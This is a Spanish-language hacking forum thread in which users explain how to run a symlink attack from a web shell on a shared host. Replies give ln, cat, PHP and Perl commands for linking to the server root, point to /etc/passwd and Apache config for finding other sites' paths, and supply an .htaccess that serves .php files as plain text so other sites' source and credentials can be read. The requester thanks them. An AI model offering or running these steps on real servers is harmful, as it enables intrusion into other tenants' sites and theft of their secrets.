[SOLUCIONADO] Con Symlink

Iniciado por jarm97171997, Marzo 02, 2013, 03:04:35 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 02, 2013, 03:04:35 PM Ultima modificación: Agosto 08, 2014, 09:53:26 PM por Expermicid
Bueno, me he descargado el symlink 3.0 pero cuando lo pruebo usar sale read /etc/named.conf alguien sabe por qué? me han dicho que lo haga manualmente pero no se como..

Marzo 02, 2013, 04:58:20 PM #1 Ultima modificación: Marzo 02, 2013, 05:01:27 PM por [Q]3rV[0]
El error se debe a que no puede identificar el fichero /etc/named.conf, proba de buscar los paths de las webs en /etc/passwd, en el fichero de configuracion de apache o a travez de algun FPD.

El symlink de manera manual lo realizas con el comando ln

Código: bash
ln -s /path/ /destino/fichero.txt


o con cat

Código: bash
cat path > destino/fichero.txt


Pero te podes encontrar con servers que tengan desabilitado dicho comando, por ende podes hacer uso de ciertos lenguajes como perl, php, etc para realizarlo

Código: php

<? symlink("path", "destino"); ?>


Código: perl
#!/usr/bin/perl -w
symlink "path", "destino";







Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Marzo 02, 2013, 05:47:00 PM #2 Ultima modificación: Marzo 02, 2013, 11:09:09 PM por Snifer
Cita de: [Q3rV[0] link=topic=14980.msg52711#msg52711 date=1362254300]
El error se debe a que no puede identificar el fichero /etc/named.conf, proba de buscar los paths de las webs en /etc/passwd, en el fichero de configuracion de apache o a travez de algun FPD.

El symlink de manera manual lo realizas con el comando ln

Código: bash
ln -s /path/ /destino/fichero.txt


o con cat

Código: bash
cat path > destino/fichero.txt


Pero te podes encontrar con servers que tengan desabilitado dicho comando, por ende podes hacer uso de ciertos lenguajes como perl, php, etc para realizarlo

Código: php

<? symlink("path", "destino"); ?>


Código: perl
#!/usr/bin/perl -w
symlink "path", "destino";


El fichero .txt no podra visualizarlo mientras no coloque algun .htaccess en la carpeta donde ha ejecutado el comando ln

---


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno, me he descargado el symlink 3.0 pero cuando lo pruebo usar sale read /etc/named.conf alguien sabe por qué? me han dicho que lo haga manualmente pero no se como..

En tu web shell ejecuta los siguientes comandos:

mkdir 123
ln -s / root

Luego subes un .htaccess para que puedas visualizar los archivos .php de las webs.
Código: text
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php


Luego abres: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cita de: [Q3rV[0] link=topic=14980.msg52711#msg52711 date=1362254300]
El error se debe a que no puede identificar el fichero /etc/named.conf, proba de buscar los paths de las webs en /etc/passwd, en el fichero de configuracion de apache o a travez de algun FPD.

El symlink de manera manual lo realizas con el comando ln

Código: bash
ln -s /path/ /destino/fichero.txt


o con cat

Código: bash
cat path > destino/fichero.txt


Pero te podes encontrar con servers que tengan desabilitado dicho comando, por ende podes hacer uso de ciertos lenguajes como perl, php, etc para realizarlo

Código: php

<? symlink("path", "destino"); ?>


Código: perl
#!/usr/bin/perl -w
symlink "path", "destino";


El fichero .txt no podra visualizarlo mientras no coloque algun .htaccess en la carpeta donde ha ejecutado el comando ln

---


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno, me he descargado el symlink 3.0 pero cuando lo pruebo usar sale read /etc/named.conf alguien sabe por qué? me han dicho que lo haga manualmente pero no se como..

En tu web shell ejecuta los siguientes comandos:

mkdir 123
ln -s / root

Luego subes un .htaccess para que puedas visualizar los archivos .php de las webs.
Código: text
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php


Luego abres: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias! gracias también a @CalebBucker en un rato pruebo aver si funciona :P